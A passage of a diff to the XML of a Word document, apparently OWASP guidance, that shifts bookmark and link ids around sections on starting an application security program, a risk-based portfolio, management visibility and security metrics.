+        <w:t>Start Your Application Security Program Now</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. This should include vendor application security testing governance, policies, verification and deployment, such that leading or organizations who use any combination of internal, managed security service providers, or out-tasked vendor security testing, can directly compare results from multiple vendors by using agreed metrics, test plans, risk management frameworks, and so on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization's application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Some of the key activities in effective application security programs include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="115" w:name="get-started"/>
       <w:bookmarkEnd w:id="115"/>
       <w:r>
         <w:rPr/>
-        <w:t>Start Your Application Security Program Now</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. This should include vendor application security testing governance, policies, verification and deployment, such that leading or organizations who use any combination of internal, managed security service providers, or out-tasked vendor security testing, can directly compare results from multiple vendors by using agreed metrics, test plans, risk management frameworks, and so on.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization's application security posture. It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Some of the key activities in effective application security programs include:</w:t>
+        <w:t>Get Started</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish an application security program and drive adoption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Conduct a capability gap analysis comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Gain management approval and establish an application security awareness campaign for the entire IT organization.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Document all your IT assets (e.g. applications) in a Configuration Management Database (CMDB).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13349,67 +13399,67 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="116" w:name="get-started"/>
+      <w:bookmarkStart w:id="116" w:name="risk-based-portfolio-approach"/>
       <w:bookmarkEnd w:id="116"/>
       <w:r>
         <w:rPr/>
-        <w:t>Get Started</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="60"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish an application security program and drive adoption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="60"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Conduct a capability gap analysis comparing your organization to your peers to define key improvement areas and an execution plan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="60"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Gain management approval and establish an application security awareness campaign for the entire IT organization.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="60"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Document all your IT assets (e.g. applications) in a Configuration Management Database (CMDB).</w:t>
+        <w:t>Risk Based Portfolio Approach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Identify the protection needs of your application portfolio from a business and regulatory perspective. Add the results to your CMDB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="61"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13417,67 +13467,67 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="117" w:name="risk-based-portfolio-approach"/>
+      <w:bookmarkStart w:id="117" w:name="enable-with-a-strong-foundation"/>
       <w:bookmarkEnd w:id="117"/>
       <w:r>
         <w:rPr/>
-        <w:t>Risk Based Portfolio Approach</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="61"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Identify the protection needs of your application portfolio from a business and regulatory perspective. Add the results to your CMDB.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="61"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish a common risk rating model with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="61"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="61"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
+        <w:t>Enable with a Strong Foundation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="62"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish a set of focused policies and minimum standards that outsourced development or custom development partners must demonstrate in your software supply chain.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="62"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish a set of focused policies and standards that provide an application security baseline for all development teams.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="62"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Define a common set of reusable security controls that complement these policies and standards and provide design and development guidance on their use.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="62"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Establish an application security training curriculum that is required and targeted to different development roles and topics.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13485,67 +13535,39 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="enable-with-a-strong-foundation"/>
+      <w:bookmarkStart w:id="118" w:name="integrate-security-into-existing-processes"/>
       <w:bookmarkEnd w:id="118"/>
       <w:r>
         <w:rPr/>
-        <w:t>Enable with a Strong Foundation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="62"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish a set of focused policies and minimum standards that outsourced development or custom development partners must demonstrate in your software supply chain.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="62"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish a set of focused policies and standards that provide an application security baseline for all development teams.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="62"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Define a common set of reusable security controls that complement these policies and standards and provide design and development guidance on their use.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="62"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Establish an application security training curriculum that is required and targeted to different development roles and topics.</w:t>
+        <w:t>Integrate Security into Existing Processes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="63"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include threat modeling, secure design &amp; review, secure coding &amp; code review, penetration testing and remediation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="63"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Provide subject matter experts and support services for development and project teams to be successful.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13553,39 +13575,39 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="integrate-security-into-existing-processes"/>
+      <w:bookmarkStart w:id="119" w:name="provide-management-visibility"/>
       <w:bookmarkEnd w:id="119"/>
       <w:r>
         <w:rPr/>
-        <w:t>Integrate Security into Existing Processes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="63"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Define and integrate secure implementation and verification activities into existing development and operational processes. Activities include threat modeling, secure design &amp; review, secure coding &amp; code review, penetration testing and remediation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="63"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Provide subject matter experts and support services for development and project teams to be successful.</w:t>
+        <w:t>Provide Management Visibility</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="64"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="64"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13593,50 +13615,10 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="120" w:name="provide-management-visibility"/>
+      <w:bookmarkStart w:id="120" w:name="examples-of-such-programs"/>
       <w:bookmarkEnd w:id="120"/>
       <w:r>
         <w:rPr/>
-        <w:t>Provide Management Visibility</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="64"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="64"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="121" w:name="examples-of-such-programs"/>
-      <w:bookmarkEnd w:id="121"/>
-      <w:r>
-        <w:rPr/>
         <w:t>Examples of such programs</w:t>
       </w:r>
     </w:p>
@@ -13653,7 +13635,7 @@
         <w:rPr/>
         <w:t xml:space="preserve">US Department of Veteran's Affairs </w:t>
       </w:r>
-      <w:hyperlink r:id="rId125">
+      <w:hyperlink r:id="rId124">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -13667,24 +13649,24 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="122" w:name="__RefHeading___Toc2400_1944273953"/>
-      <w:bookmarkStart w:id="123" w:name="am-whats-next-for-managers"/>
+      <w:bookmarkStart w:id="121" w:name="__RefHeading___Toc2389_410054668"/>
+      <w:bookmarkStart w:id="122" w:name="am-whats-next-for-managers"/>
+      <w:bookmarkEnd w:id="121"/>
       <w:bookmarkEnd w:id="122"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+AM What's next for managers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="123" w:name="appsec-program"/>
       <w:bookmarkEnd w:id="123"/>
       <w:r>
         <w:rPr/>
-        <w:t>+AM What's next for managers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="124" w:name="appsec-program"/>
-      <w:bookmarkEnd w:id="124"/>
-      <w:r>
-        <w:rPr/>
         <w:t>AppSec Program</w:t>
       </w:r>
     </w:p>
@@ -13721,7 +13703,7 @@
         <w:rPr/>
         <w:t xml:space="preserve">Consider reviewing your application security program against the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId126">
+      <w:hyperlink r:id="rId125">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -13795,11 +13777,165 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="125" w:name="metrics"/>
+      <w:bookmarkStart w:id="124" w:name="metrics"/>
+      <w:bookmarkEnd w:id="124"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Metrics</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A key issue is how do you measure the reduction in risk, year on year, especially if you are just starting out on an app sec program, or engaging in new ways of testing applications and APIs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Some metrics to get you going include:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>How many defects are currently known per application?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Does this indicate security technical debt or training requirements?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Does this indicate the need to upgrade or replace certain platforms?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>How many critical, high and medium risks have been resolved over time?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>How much does a security defect cost to resolve? This helps provide the investment case for training, retiring known technical debt, and helping the business surface the true costs of going live with unknown risk</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>How effective are your testing partners in reducing your risk? Do they help find impactful issues? Could they be better used in some way?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>How many apps have never been tested? Do they contain any sensitive data assets?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="67"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Tracking if testing is overdue or required for regulatory compliance reasons, such as PCI ASV scans or privacy impact assessments</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>There are many forms of metrics that can be found. Be careful of metrics that don't align business and security, but instead aim to reduce costs - such as cost per bug. At a certain point, KPIs need to be aligned with enabling secure business, not cost reductions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="125" w:name="this-is-just-the-start"/>
       <w:bookmarkEnd w:id="125"/>
       <w:r>
         <w:rPr/>
-        <w:t>Metrics</w:t>
+        <w:t>This is just the start</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13809,7 +13945,43 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>A key issue is how do you measure the reduction in risk, year on year, especially if you are just starting out on an app sec program, or engaging in new ways of testing applications and APIs.</w:t>
+        <w:t>Starting the application security journey can feel overwhelming. A key takeaway is that you can't review your way to building a bridge; at some point you must build it. Let's ensure that security is deeply esconced within the organization, and aligned with organizational objectives.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="126" w:name="__RefHeading___Toc2391_410054668"/>
+      <w:bookmarkStart w:id="127" w:name="a-whats-next-for-application-managers"/>
+      <w:bookmarkEnd w:id="126"/>
+      <w:bookmarkEnd w:id="127"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+A: What's next for Application Managers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="128" w:name="manage-the-full-application-lifecycle"/>
+      <w:bookmarkEnd w:id="128"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Manage the full Application Lifecycle</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13819,129 +13991,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Some metrics to get you going include:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>How many defects are currently known per application?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Does this indicate security technical debt or training requirements?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Does this indicate the need to upgrade or replace certain platforms?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>How many critical, high and medium risks have been resolved over time?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>How much does a security defect cost to resolve? This helps provide the investment case for training, retiring known technical debt, and helping the business surface the true costs of going live with unknown risk</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>How effective are your testing partners in reducing your risk? Do they help find impactful issues? Could they be better used in some way?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="67"/>
